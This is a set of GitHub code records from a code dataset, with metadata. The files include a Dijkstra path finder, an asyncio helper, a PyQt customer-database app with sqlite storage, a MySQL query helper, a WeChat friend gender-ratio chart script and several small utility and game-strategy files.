dist[v_id] = dist[u_id] + w_uv\r\n heapq.heappush(PQ, [v_id, dist[v_id]])\r\n pred[v_id] = u_id\r\n \r\n if dist[target]==INF:\r\n print(\"There is no path between \" + source + \" and \" + target)\r\n else:\r\n st = []\r\n node = target\r\n while(True):\r\n st.append(str(node))\r\n if(node==pred[node]):\r\n break\r\n node = pred[node]\r\n path = st[::-1]\r\n print(\"The shortest path is: \" + \" \".join(path))\r\nadj=SqliteDict(\"simplewikitest.sqlite\")\r\n'''for i in adj.keys():\r\n print(str(i))'''\r\ndijkstra(adj,\"anarchy\",\"nation\")","repo_name":"yashobam/dijkstra","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16612964989","text":"# -*- coding: utf-8 -*-\n\"\"\"Coroutine as_completed.\"\"\"\nimport asyncio\nfrom collections.abc import AsyncGenerator\nfrom functools import partial\nimport typing\nfrom typing import Any\n\nDEFAULT_CAPACITY = 32\n\n\nasync def as_completed(agen: typing.AsyncGenerator, capacity=DEFAULT_CAPACITY) -> typing.AsyncGenerator:\n \"\"\"Coroutine as_completed.\n\n Receive completed tasks as they are done.\n \"\"\"\n async for item in Waiter(agen, capacity=capacity):\n yield item\n\n\nclass Waiter(AsyncGenerator):\n \"\"\"Waiter.\"\"\"\n\n def __init__(self, agen: typing.AsyncGenerator, *, 
capacity=DEFAULT_CAPACITY):\n \"\"\"Init Waiter.\"\"\"\n self.agen = agen\n self.counter = asyncio.Queue(maxsize=capacity)\n self.queue_out = asyncio.Queue()\n self.tasks = dict()\n\n def __aiter__(self):\n \"\"\"Async iter method.\"\"\"\n consume_task = asyncio.current_task()\n produce_task = asyncio.create_task(self.produce())\n cancel_callback = partial(Waiter.stop_consuming, consume_task)\n produce_task.add_done_callback(cancel_callback)\n return self\n\n async def __anext__(self):\n \"\"\"Async next method.\"\"\"\n item = await self.queue_out.get()\n self.queue_out.task_done()\n return item\n\n @staticmethod\n def stop_consuming(consume_task: asyncio.Task, task_done):\n try:\n consume_task.get_coro().throw(StopAsyncIteration)\n except StopIteration:\n pass\n\n async def produce(self):\n \"\"\"Produce method.\"\"\"\n async for item in self.agen:\n await self.counter.put(0)\n self.launch_task(item)\n await self.counter.join()\n await self.queue_out.join()\n\n def launch_task(self, aw: typing.Awaitable):\n task: asyncio.Task = asyncio.create_task(aw)\n task.add_done_callback(self.done_task)\n self.register_task(task)\n\n def register_task(self, task: asyncio.Task):\n task_name = task.get_name()\n self.tasks[task_name] = task\n\n def unregister_task(self, task: asyncio.Task):\n task_name = task.get_name()\n self.tasks.pop(task_name)\n\n def done_task(self, task_done):\n self.counter.get_nowait()\n self.queue_out.put_nowait(task_done)\n self.unregister_task(task_done)\n self.counter.task_done()\n\n def asend(self, value) -> typing.Awaitable:\n \"\"\"Asend method.\"\"\"\n\n def athrow(self, typ: typing.Type[BaseException], val: typing.Optional[BaseException] = ...,\n tb: Any = ...) -> typing.Awaitable:\n \"\"\"Athrow method.\"\"\"\n\n def aclose(self) -> typing.Awaitable:\n \"\"\"Aclose method.\"\"\"\n","repo_name":"andribas404/probable-doodle","sub_path":"probable_doodle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14574660716","text":"def find_minimum(arr):\n length = len(arr)\n for x in range(len(arr) - length + 1):\n a, b, c = arr[x], arr[x + 1], arr[x + 2]\n if a < b and a < c:\n return a\n if b < a and b < c:\n return b\n else:\n return c\n\n\ndef minimum_of_three(arr):\n result = []\n for x in arr:\n result.append(find_minimum(x))\n output = ' '.join(list(map(str, result)))\n return output\n","repo_name":"myusko/algosproblems","sub_path":"algos/arrays/minimum_of_three.py","file_name":"minimum_of_three.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39562608715","text":"#importing required packages\nimport sys,sqlite3,time\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QTextCursor\nfrom PyQt5.QtWidgets import QTableWidgetItem,QTableWidget,QComboBox,QVBoxLayout,QGridLayout,QDialog,QWidget, QPushButton, QApplication, QMainWindow,QAction,QMessageBox,QLabel,QTextEdit,QProgressBar,QLineEdit\nfrom PyQt5.QtCore import QCoreApplication\n\n#defining class to handle database queries\nclass DBHelper():\n def __init__(self):\n self.conn = sqlite3.connect(\"cdms.db\")\n self.c = self.conn.cursor()\n #initializing database tables if they do not exist already\n self.c.execute(\"CREATE TABLE IF NOT EXISTS customers(cid INTEGER,name TEXT,gender INTEGER,storeid INTEGER,age INTEGER,address TEXT,mobile INTEGER)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS 
transactions(reciept_no INTEGER,cid INTEGER,fee INTEGER,storeid INTEGER,reciept_date TEXT, payment_type INTEGER, eid INTEGER)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS stores(storeid INTEGER,name TEXT)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS employees(eid INTEGER,name TEXT, mobile INTEGER)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS directory(id INTEGER,name TEXT, mobile INTEGER)\")\n #method for adding customer to database\n def addCustomer(self, cid, name, gender, storeid, age, address, mobile):\n try:\n self.c.execute(\"INSERT INTO customers (cid,name,gender,storeid,age,address,mobile) VALUES (?,?,?,?,?,?,?)\", (cid, name, gender, storeid, age, address, mobile))\n self.conn.commit()\n self.c.close()\n self.conn.close()\n QMessageBox.information(QMessageBox(), 'Successful', 'Customer is added successfully to the database.')\n #exception error\n except Exception:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not add customer to the database.')\n #method for adding transaction to database\n def addTransaction(self,cid,fee,storeid,payment_type, eid):\n reciept_no=int(time.time())\n date=time.strftime(\"%b %d %Y %H:%M:%S\")\n try:\n self.c.execute(\"INSERT INTO transactions (reciept_no,cid,fee,storeid,reciept_date,payment_type,eid) VALUES (?,?,?,?,?,?,?)\",(reciept_no, cid, fee, storeid, date, payment_type, eid))\n self.conn.commit()\n self.c.close()\n self.conn.close()\n QMessageBox.information(QMessageBox(), 'Successful','Transaction is added successfully to the database.\\nReference ID=' + str(reciept_no))\n #exception error\n except Exception:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not add transaction to the database.')\n #method to search for customer using a cid number and the results are returned to the function showCustomer() which then analyzes the list\n def searchCustomer(self, cid):\n self.c.execute(\"SELECT * from customers WHERE cid=\" + str(cid))\n self.data = self.c.fetchone()\n #if there is no data returned by above cursor function fetchone() then it means there is no record holding the cid number, so a warning box displayed and returned from the function\n if not self.data:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not find any customer with cid no ' + str(cid))\n return None\n self.list = []\n #add query results into list form\n for i in range(0, 7):\n self.list.append(self.data[i])\n self.c.close()\n self.conn.close()\n #calls on function that takes the list and displays the output in tabular form to the user\n showCustomer(self.list)\n #method to search transactions based on cid number\n def searchTransaction(self,cid):\n #initialize text string to hold transaction query results\n text=''\n self.c.execute(\"SELECT * from transactions WHERE cid=\"+str(cid)+\" ORDER BY reciept_no DESC\")\n self.data=self.c.fetchall()\n #error returned if there are no transactions for given cid\n if not self.data:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not find any transactions for customer with cid: '+str(cid))\n return None\n #add query results to text string\n for row in self.data:\n text+=str(row)+\"\\n\"\n self.c.close()\n self.conn.close()\n #passes text string to function to display results to the user\n showTransactionFunction(text)\n\n\n#function to display results for customer given the query results passed in list form\ndef showCustomer(list):\n #initialize attributes\n cid = 0\n gender = \"\"\n storeid = \"\"\n age = \"\"\n name = \"\"\n address = \"\"\n mobile = -1\n #defining values from list\n cid = list[0]\n 
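# the seven fields follow the customers table column order: cid, name, gender, storeid, age, address, mobile\n    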
name = list[1]\n\n if list[2] == 0:\n gender = \"Male\"\n else:\n gender = \"Female\"\n\n if list[3] == 0:\n storeid = \"Store 0\"\n elif list[3] == 1:\n storeid = \"Store 1\"\n elif list[3] == 2:\n storeid = \"Store 2\"\n elif list[3] == 3:\n storeid = \"Store 3\"\n elif list[3] == 4:\n storeid = \"Store 4\"\n elif list[3] == 5:\n storeid = \"Store 5\"\n\n age = list[4]\n address = list[5]\n mobile = list[6]\n\n #creating a PyQt table and passing in the labels,values in x,y grid form\n table = QTableWidget()\n table.setWindowTitle(\"Customer Details\")\n #setting table dimensions\n table.setRowCount(7)\n table.setColumnCount(2)\n #adding labels, values as widget items in x,y form\n table.setItem(0, 0, QTableWidgetItem(\"Cid\"))\n table.setItem(0, 1, QTableWidgetItem(str(cid)))\n table.setItem(1, 0, QTableWidgetItem(\"Name\"))\n table.setItem(1, 1, QTableWidgetItem(str(name)))\n table.setItem(2, 0, QTableWidgetItem(\"Gender\"))\n table.setItem(2, 1, QTableWidgetItem(str(gender)))\n table.setItem(3, 0, QTableWidgetItem(\"Store Id\"))\n table.setItem(3, 1, QTableWidgetItem(str(storeid)))\n table.setItem(4, 0, QTableWidgetItem(\"Age\"))\n table.setItem(4, 1, QTableWidgetItem(str(age)))\n table.setItem(5, 0, QTableWidgetItem(\"Address\"))\n table.setItem(5, 1, QTableWidgetItem(str(address)))\n table.setItem(6, 0, QTableWidgetItem(\"Mobile\"))\n table.setItem(6, 1, QTableWidgetItem(str(mobile)))\n table.horizontalHeader().setStretchLastSection(True)\n table.show()\n #initilize dialog box and add table widget\n dialog = QDialog()\n dialog.setWindowTitle(\"Customer Details\")\n dialog.resize(500, 300)\n dialog.setLayout(QVBoxLayout())\n dialog.layout().addWidget(table)\n dialog.exec()\n\n#function to display the transactions for the text string of query results passed in\ndef showTransactionFunction(text):\n #initializing a QTextEdit widget item to hold the text string\n logOutput = QTextEdit()\n logOutput.setReadOnly(True)\n logOutput.setLineWrapMode(QTextEdit.NoWrap)\n font = logOutput.font()\n font.setFamily(\"Courier\")\n font.setPointSize(10)\n logOutput.moveCursor(QTextCursor.End)\n logOutput.setCurrentFont(font)\n logOutput.setTextColor(QtGui.QColor(\"black\"))\n logOutput.insertPlainText(text)\n sb = logOutput.verticalScrollBar()\n sb.setValue(sb.maximum())\n #initializing dialog box and adding the logOutput widget\n dialog = QDialog()\n dialog.setWindowTitle(\"Customer Transactions\")\n dialog.resize(500, 300)\n dialog.setLayout(QVBoxLayout())\n dialog.layout().addWidget(logOutput)\n dialog.exec()\n\n\n#creating a class which inherits QDialog to create the entry form of adding a new customer to the database\nclass AddCustomer(QDialog):\n def __init__(self):\n super().__init__()\n\n #general attributes\n self.gender=-1\n self.storeid=-1\n self.age=-1\n self.cid=-1\n self.name=\"\"\n self.address=\"\"\n self.mobile=-1\n\n #initilialzing buttons for cancel, reset and add\n self.btnCancel=QPushButton(\"Cancel\",self)\n self.btnReset=QPushButton(\"Reset\",self)\n self.btnAdd=QPushButton(\"Add\",self)\n self.btnCancel.setFixedHeight(30)\n self.btnReset.setFixedHeight(30)\n self.btnAdd.setFixedHeight(30)\n\n #creating QComboBox items for dropdown selection of categorical variables\n self.genderCombo = QComboBox(self)\n self.genderCombo.addItem(\"Male\")\n self.genderCombo.addItem(\"Female\")\n\n self.storeidCombo = QComboBox(self)\n self.storeidCombo.addItem(\"Store 0\")\n self.storeidCombo.addItem(\"Store 1\")\n self.storeidCombo.addItem(\"Store 2\")\n self.storeidCombo.addItem(\"Store 3\")\n 
self.storeidCombo.addItem(\"Store 4\")\n self.storeidCombo.addItem(\"Store 5\")\n\n #creating QLabel items for the variables to be entered/selected\n self.cidLabel=QLabel(\"Cid No\")\n self.nameLabel=QLabel(\"Name\")\n self.addressLabel = QLabel(\"Address\")\n self.mobLabel = QLabel(\"Mobile\")\n self.ageLabel = QLabel(\"Age\")\n self.storeidLabel = QLabel(\"Storeid\")\n self.genderLabel=QLabel(\"Gender\")\n\n #QLineEdit items for variables that must be typed\n self.cidText=QLineEdit(self)\n self.nameText=QLineEdit(self)\n self.addressText = QLineEdit(self)\n self.ageText=QLineEdit(self)\n self.mobText = QLineEdit(self)\n\n #initializing a QGridLayout and adding labels,items in x,y format\n self.grid=QGridLayout(self)\n self.grid.addWidget(self.cidLabel,1,1)\n self.grid.addWidget(self.nameLabel,2,1)\n self.grid.addWidget(self.genderLabel, 3, 1)\n self.grid.addWidget(self.addressLabel, 4, 1)\n self.grid.addWidget(self.ageLabel, 5, 1)\n self.grid.addWidget(self.storeidLabel, 6, 1)\n self.grid.addWidget(self.mobLabel,7,1)\n\n self.grid.addWidget(self.cidText,1,2)\n self.grid.addWidget(self.nameText,2,2)\n self.grid.addWidget(self.genderCombo, 3, 2)\n self.grid.addWidget(self.addressText, 4, 2)\n self.grid.addWidget(self.ageText,5,2)\n self.grid.addWidget(self.storeidCombo, 6, 2)\n self.grid.addWidget(self.mobText, 7, 2)\n\n #adding three buttons into grid\n self.grid.addWidget(self.btnReset,9,1)\n self.grid.addWidget(self.btnAdd,9,2)\n self.grid.addWidget(self.btnCancel,9,3)\n\n #button connectors where Add calls of addCustomer(), Cancel quits the instance, Reset calls of reset()\n self.btnAdd.clicked.connect(self.addCustomer)\n self.btnCancel.clicked.connect(QApplication.instance().quit)\n self.btnReset.clicked.connect(self.reset)\n\n #initializing the window and adding the grid\n self.setLayout(self.grid)\n self.setWindowTitle(\"Add Customer Details\")\n self.resize(500,300)\n self.show()\n sys.exit(self.exec())\n\n #reset method which resets the text field values\n def reset(self):\n self.cidText.setText(\"\")\n self.nameText.setText(\"\")\n self.addressText.setText(\"\")\n self.ageText.setText(\"\")\n self.mobText.setText(\"\")\n\n #addCustomer method which takes the values entered/selected and passes them to the DBHelper class to run the database query\n def addCustomer(self):\n self.gender=self.genderCombo.currentIndex()\n self.storeid=self.storeidCombo.currentIndex()\n self.cid=int(self.cidText.text())\n self.name=self.nameText.text()\n self.age=int(self.ageText.text())\n self.address=self.addressText.text()\n self.mobile=int(self.mobText.text())\n #passes fields to DBHelper\n self.dbhelper=DBHelper()\n self.dbhelper.addCustomer(self.cid,self.name,self.gender,self.storeid,self.age,self.address,self.mobile)\n\n#creating a class which inherits QDialog to create the entry form of adding a new transaction to the database\nclass AddTransaction(QDialog):\n def __init__(self):\n super().__init__()\n\n #general attributes\n self.reciept_no=-1\n self.cid=-1\n self.fee=-1\n self.storeid=-1\n self.reciept_date=-1\n self.payment_type=-1\n self.eid=-1\n\n #initializing cancel,add,reset buttons\n self.btnCancel=QPushButton(\"Cancel\",self)\n self.btnReset=QPushButton(\"Reset\",self)\n self.btnAdd=QPushButton(\"Add\",self)\n self.btnCancel.setFixedHeight(30)\n self.btnReset.setFixedHeight(30)\n self.btnAdd.setFixedHeight(30)\n\n #creating QComboBox items for dropdown selection of categorical variables\n self.storeidCombo = QComboBox(self)\n self.storeidCombo.addItem(\"Store 0\")\n 
self.storeidCombo.addItem(\"Store 1\")\n self.storeidCombo.addItem(\"Store 2\")\n self.storeidCombo.addItem(\"Store 3\")\n self.storeidCombo.addItem(\"Store 4\")\n self.storeidCombo.addItem(\"Store 5\")\n\n self.paymenttypeCombo = QComboBox(self)\n self.paymenttypeCombo.addItem(\"Cash\")\n self.paymenttypeCombo.addItem(\"Debit\")\n self.paymenttypeCombo.addItem(\"Credit\")\n\n #creating QLabel items for variables\n self.cidLabel=QLabel(\"Cid No\")\n self.feeLabel=QLabel(\"Total Fee\")\n self.storeidLabel = QLabel(\"Store id\")\n self.paymenttypeLabel = QLabel(\"Payment type\")\n self.eidLabel = QLabel(\"Employee id\")\n\n #creating QLineEdit items for values that need to be typed by the user\n self.cidText=QLineEdit(self)\n self.feeText=QLineEdit(self)\n self.eidText=QLineEdit(self)\n\n #creating a grid and adding the labels,widgets in x,y format\n self.grid=QGridLayout(self)\n self.grid.addWidget(self.cidLabel,1,1)\n self.grid.addWidget(self.feeLabel,2,1)\n self.grid.addWidget(self.storeidLabel, 3, 1)\n self.grid.addWidget(self.paymenttypeLabel, 4, 1)\n self.grid.addWidget(self.eidLabel, 5, 1)\n\n self.grid.addWidget(self.cidText,1,2)\n self.grid.addWidget(self.feeText,2,2)\n self.grid.addWidget(self.storeidCombo, 3, 2)\n self.grid.addWidget(self.paymenttypeCombo, 4, 2)\n self.grid.addWidget(self.eidText, 5, 2)\n\n #adding three buttons in grid form\n self.grid.addWidget(self.btnReset,6,1)\n self.grid.addWidget(self.btnAdd,6,2)\n self.grid.addWidget(self.btnCancel,6,3)\n\n #button connections for Add which calls on addTransaction(), Cancel which quits the instance, Reset which calls on reset()\n self.btnAdd.clicked.connect(self.addTransaction)\n self.btnCancel.clicked.connect(QApplication.instance().quit)\n self.btnReset.clicked.connect(self.reset)\n\n #setting the window layout and adding the grid\n self.setLayout(self.grid)\n self.setWindowTitle(\"Add Transaction Details\")\n self.resize(400,200)\n self.show()\n sys.exit(self.exec())\n\n #reset method that resets the text fields\n def reset(self):\n self.cidText.setText(\"\")\n self.feeText.setText(\"\")\n self.eidText.setText(\"\")\n\n #addTransaction method which takes the field values and passes them to the DBHelper class to run the database query\n def addTransaction(self):\n self.storeid=self.storeidCombo.currentIndex()\n self.paymenttype=self.paymenttypeCombo.currentIndex()\n self.cid=int(self.cidText.text())\n self.fee=int(self.feeText.text())\n self.eid=int(self.eidText.text())\n\n #passes fields to DBHelper class\n self.dbhelper=DBHelper()\n self.dbhelper.addTransaction(self.cid,self.fee,self.storeid,self.paymenttype,self.eid)\n\n\n#creating a main Window class with inheritance QMainWindow that holds the buttons for Enter Customer Details, Enter Payment Details, Show Customer Details, Show Transaction Details\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n\n #intializing QDialog prompt for case where search for Show Customer Details is selected\n self.cidToBeSearched=0\n #initializing box layout and creating label, entry field and Seach button\n self.vbox = QVBoxLayout()\n self.text = QLabel(\"Enter the cid no of the customer\")\n self.editField = QLineEdit()\n self.btnSearch = QPushButton(\"Search\", self)\n #calls on showCustomer method when clicked\n self.btnSearch.clicked.connect(self.showCustomer)\n #adding widgets to box layout\n self.vbox.addWidget(self.text)\n self.vbox.addWidget(self.editField)\n self.vbox.addWidget(self.btnSearch)\n #creating dialog and adding box layout\n self.dialog = 
QDialog()\n self.dialog.setWindowTitle(\"Enter cid No\")\n self.dialog.setLayout(self.vbox)\n\n #intializing QDialog prompt for case where search for Show Transaction Details is selected\n self.cidForTransaction = 0\n #initializing box layout and creating label, entry field and Seach button\n self.vboxTransaction = QVBoxLayout()\n self.textTransaction = QLabel(\"Enter the cid no of the customer\")\n self.editFieldTransaction = QLineEdit()\n self.btnSearchTransaction = QPushButton(\"Search\", self)\n #calls on showCustomerTransaction method when clicked\n self.btnSearchTransaction.clicked.connect(self.showCustomerTransaction)\n #adding widgets to box layout\n self.vboxTransaction.addWidget(self.textTransaction)\n self.vboxTransaction.addWidget(self.editFieldTransaction)\n self.vboxTransaction.addWidget(self.btnSearchTransaction)\n #creating dialog and adding box layout\n self.dialogTransaction = QDialog()\n self.dialogTransaction.setWindowTitle(\"Enter Cid No\")\n self.dialogTransaction.setLayout(self.vboxTransaction)\n\n #creating the 4 buttons on the main window\n self.btnEnterCustomer=QPushButton(\"Enter Customer Details\", self)\n self.btnEnterTransaction=QPushButton(\"Enter Transaction Details\",self)\n self.btnShowCustomerDetails=QPushButton(\"Show Customer Details\",self)\n self.btnShowTransactionDetails=QPushButton(\"Show Transaction Details\",self)\n\n #adding image\n self.image=QLabel(self)\n self.image.resize(150,150)\n self.image.move(120,20)\n self.image.setScaledContents(True)\n self.image.setPixmap(QtGui.QPixmap(\"icon.png\"))\n\n #placing buttons and mapping to their respective methods\n self.btnEnterCustomer.move(15,170)\n self.btnEnterCustomer.resize(180,40)\n self.btnEnterCustomerFont=self.btnEnterCustomer.font()\n self.btnEnterCustomerFont.setPointSize(13)\n self.btnEnterCustomer.setFont(self.btnEnterCustomerFont)\n self.btnEnterCustomer.clicked.connect(self.entercustomer)\n\n self.btnEnterTransaction.move(205,170)\n self.btnEnterTransaction.resize(180, 40)\n self.btnEnterTransaction.setFont(self.btnEnterCustomerFont)\n self.btnEnterTransaction.clicked.connect(self.entertransaction)\n\n self.btnShowCustomerDetails.move(15, 220)\n self.btnShowCustomerDetails.resize(180, 40)\n self.btnShowCustomerDetails.setFont(self.btnEnterCustomerFont)\n self.btnShowCustomerDetails.clicked.connect(self.showCustomerDialog)\n\n self.btnShowTransactionDetails.move(205, 220)\n self.btnShowTransactionDetails.resize(180, 40)\n self.btnShowTransactionDetails.setFont(self.btnEnterCustomerFont)\n self.btnShowTransactionDetails.clicked.connect(self.showCustomerTransactionDialog)\n\n #resizing and setting window title\n self.resize(400,280)\n self.setWindowTitle(\"Customer Database Management System\")\n\n #entercustomer method which call on the AddCustomer function\n def entercustomer(self):\n enterCustomer=AddCustomer()\n\n #entertransaction method which calls on the AddTransaction function\n def entertransaction(self):\n enterTransaction=AddTransaction()\n\n #showCustomerDialog method which executes QDialog prompt for case where Show Customer Details is selected\n def showCustomerDialog(self):\n self.dialog.exec()\n\n #showCustomerTransactionDialog method which executes QDialog prompt for case where Show Transaction Details is selected\n def showCustomerTransactionDialog(self):\n self.dialogTransaction.exec()\n\n #showCustomer method that takes editField entry and passes to DBHelper class to run query\n def showCustomer(self):\n if self.editField.text() is \"\":\n 
QMessageBox.warning(QMessageBox(), 'Error',\n                                'You must give the cid number to show the results for.')\n            return None\n        showcustomer = DBHelper()\n        #runs DBHelper class for searchCustomer\n        showcustomer.searchCustomer(int(self.editField.text()))\n\n    #showCustomerTransaction method that takes editField entry and passes to DBHelper class to run query\n    def showCustomerTransaction(self):\n        if self.editFieldTransaction.text() == \"\":\n            QMessageBox.warning(QMessageBox(), 'Error',\n                                'You must give the cid number to show the results for.')\n            return None\n        showcustomer = DBHelper()\n        #runs DBHelper class for searchTransaction\n        showcustomer.searchTransaction(int(self.editFieldTransaction.text()))\n\n#creating a Login window class with inheritance QDialog\nclass Login(QDialog):\n    def __init__(self, parent=None):\n        super(Login, self).__init__(parent)\n        #label and QLineEdit fields for username and password\n        self.userNameLabel=QLabel(\"Username\")\n        self.userPassLabel=QLabel(\"Password\")\n        self.textName = QLineEdit(self)\n        self.textPass = QLineEdit(self)\n        #Login button which calls upon handleLogin when clicked\n        self.buttonLogin = QPushButton('Login', self)\n        self.buttonLogin.clicked.connect(self.handleLogin)\n        #adding widget items to QGridLayout layout dialog in x,y format\n        layout = QGridLayout(self)\n        layout.addWidget(self.userNameLabel, 1, 1)\n        layout.addWidget(self.userPassLabel, 2, 1)\n        layout.addWidget(self.textName,1,2)\n        layout.addWidget(self.textPass,2,2)\n        layout.addWidget(self.buttonLogin,3,1,1,2)\n        self.setWindowTitle(\"Login\")\n\n    #handleLogin method that verifies entered login details\n    def handleLogin(self):\n        if (self.textName.text() == 'admin' and\n            self.textPass.text() == 'admin'):\n            self.accept()\n        else:\n            QMessageBox.warning(\n                self, 'Error', 'Bad user or password')\n\n#main function which executes the login dialog first\n#main window is opened upon a successful login\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    login = Login()\n\n    if login.exec_() == QDialog.Accepted:\n        window = Window()\n        window.show()\n\n        sys.exit(app.exec_())\n","repo_name":"tniaz/Customer-Database-Management-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}{"seq_id":"4767235346","text":"\"\"\"\nModule: port_settings.py\nAuthor: Chris Lawton, DLS Solutions, Inc.\nDescription: Contains the PortSettings class\n\"\"\"\n\nclass PortSettings:\n    \"\"\"\n    Provides common serial port settings and defaults.\n    \"\"\"\n    baud = 115200\n    parity = \"N\"\n    dataBits = 8\n    stopBits = 1\n    ","repo_name":"habibiam/opto_luna","sub_path":"LunaSrv/port_settings.py","file_name":"port_settings.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}{"seq_id":"6514823349","text":"from mysql import connector\r\nfrom NewApi.common.read_config import ReadConfig\r\nfrom NewApi.common import project_path\r\n\r\nclass DoMysql:\r\n    '''Class for database operations, used only for reading data'''\r\n\r\n    def do_mysql(self,query,flag=1):\r\n        '''\r\n        query: the SQL query statement\r\n        flag: 1 to fetch one row, 2 to fetch multiple rows'''\r\n        db_config = ReadConfig(project_path.conf_path).get_data('DB', 'db_config')\r\n\r\n        cnn = connector.connect(**db_config)\r\n        cursor = cnn.cursor()\r\n        cursor.execute(query)\r\n\r\n        if flag == 1:\r\n            res = cursor.fetchone()\r\n        else:\r\n            res = cursor.fetchall()\r\n\r\n        return res\r\n\r\n\r\nif __name__ == '__main__':\r\n    query = 'SELECT * FROM `load` WHERE 
Id<23528' # '\r\n    res = DoMysql().do_mysql(query, 2)\r\n    print('Database query result 1: {}'.format(res))","repo_name":"acycy/test_demo","sub_path":"pyClass/NewApi/common/do_mysql.py","file_name":"do_mysql.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}{"seq_id":"1455495561","text":"import os, sys\nfrom PySide import QtGui, QtCore\n\nfrom variables import *\nclass liqueModeler(QtGui.QWidget):\n\tdef __init__(self):\n\t\tsuper(liqueModeler, self).__init__()\n\t\tself.setWindowTitle('LiqueModeler')\n\t\tself.resize(300,300)\n\n\t\tself.s_l_textbox = QtGui.QLineEdit(self)\n\t\tself.s_l_textbox.setEnabled(False)\n\n\t\tself.s_l_writebox = QtGui.QLineEdit(self)\n\n\t\tself.s_w_textbox = QtGui.QLineEdit(self)\n\n\t\tself.createButton = QtGui.QPushButton('PAPER THAT')\n\n\t\thbox = QtGui.QHBoxLayout()\n\n\t\thbox.addWidget(self.s_l_textbox)\n\t\thbox.addWidget(self.s_l_writebox)\n\n\t\t# main widget: nest the row above inside a vertical layout (a widget may only have one top-level layout)\n\n\t\tvbox = QtGui.QVBoxLayout()\n\n\t\tvbox.addLayout(hbox)\n\t\tvbox.addWidget(self.s_w_textbox)\n\t\tvbox.addWidget(self.createButton)\n\n\t\tself.setLayout(vbox)\n\napp = QtGui.QApplication.instance()\nowns_app = app is None\nif owns_app:\n\tapp = QtGui.QApplication(sys.argv)\nlM = liqueModeler()\nlM.show()\nif owns_app:\n\t# start the event loop only when this script created the QApplication itself\n\tsys.exit(app.exec_())\n","repo_name":"ChienLoutre/LiqueTools","sub_path":"utils/modeling/liquemodeler.py","file_name":"liquemodeler.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"}{"seq_id":"24877546139","text":"# Count the gender ratio among WeChat friends\n# coding=utf8\n\nimport itchat\nimport numpy as ny\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\n\nitchat.login()\n# fetch the friends list\nfriends = itchat.get_friends(update=True)\n\n# initialize the counters: male, female, and friends who did not fill in a gender\nmale = female = other = 0\n\nprint(\"Your own account is the first entry in the friends list\")\nprint(friends[0])\n\nfor i in friends[1:]:\n    # 1 means male, 2 means female\n    sex = i[\"Sex\"]\n    if sex == 1:\n        male += 1\n    elif sex == 2:\n        female += 1\n    else:\n        other += 1\n\n\n# compute the total number of friends\ntotal = len(friends[1:])\n\n# print the gender percentages\nmale_percent = (float(male) / total * 100)\nfemale_percent = (float(female) / total * 100)\nother_percent = (float(other) / total * 100)\nprint(\"Male friends: %.2f%%\" % male_percent + \"\\n\"\n      + \"Female friends: %.2f%%\" % female_percent + \"\\n\"\n      + \"Friends of unknown gender: %.2f%%\" % other_percent)\n\n# draw a pie chart of the percentages\nlabels = ['Male', 'Female', 'Unknown']\nx = [male, female, other]\nfig = plt.figure()\n\n# step 1 (switch to a sans-serif font that can also render CJK glyphs)\nplt.rcParams['font.sans-serif'] = ['SimHei']\n# step 2 (fix the minus sign on axes, which step 1 usually breaks)\nplt.rcParams['axes.unicode_minus'] = False\n\nplt.pie(x, labels=labels, autopct='%1.2f%%')\nplt.title('Pie chart')\nplt.savefig(\"PieChart.png\")\nplt.show()\n","repo_name":"kamihati/itchat_robot","sub_path":"34.py","file_name":"34.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}{"seq_id":"34691720621","text":"import gamelib\nimport random\nimport math\nimport warnings\nfrom sys import maxsize\nimport json\n\n\n\"\"\"\nMost of the algo code you write will be in this file unless you create new\nmodules yourself. Start by modifying the 'on_turn' function.\n\nAdvanced strategy tips: \n\n  - You can analyze action frames by modifying on_action_frame function\n\n  - The GameState.map object can be manually manipulated to create hypothetical \n    board states. Though, we recommend making a copy of the map to preserve 
Though, we recommended making a copy of the map to preserve \n the actual current map state.\n\"\"\"\n\nclass AlgoStrategy(gamelib.AlgoCore):\n def __init__(self):\n super().__init__()\n seed = random.randrange(maxsize)\n random.seed(seed)\n gamelib.debug_write('Random seed: {}'.format(seed))\n\n def on_game_start(self, config):\n \"\"\" \n Read in config and perform any initial setup here \n \"\"\"\n gamelib.debug_write('Configuring your custom algo strategy...')\n self.config = config\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER, BITS, CORES\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\n PING = config[\"unitInformation\"][3][\"shorthand\"]\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\n BITS = 1\n CORES = 0\n # This is a good place to do initial setup\n self.scored_on_locations = []\n\n \n \n\n def 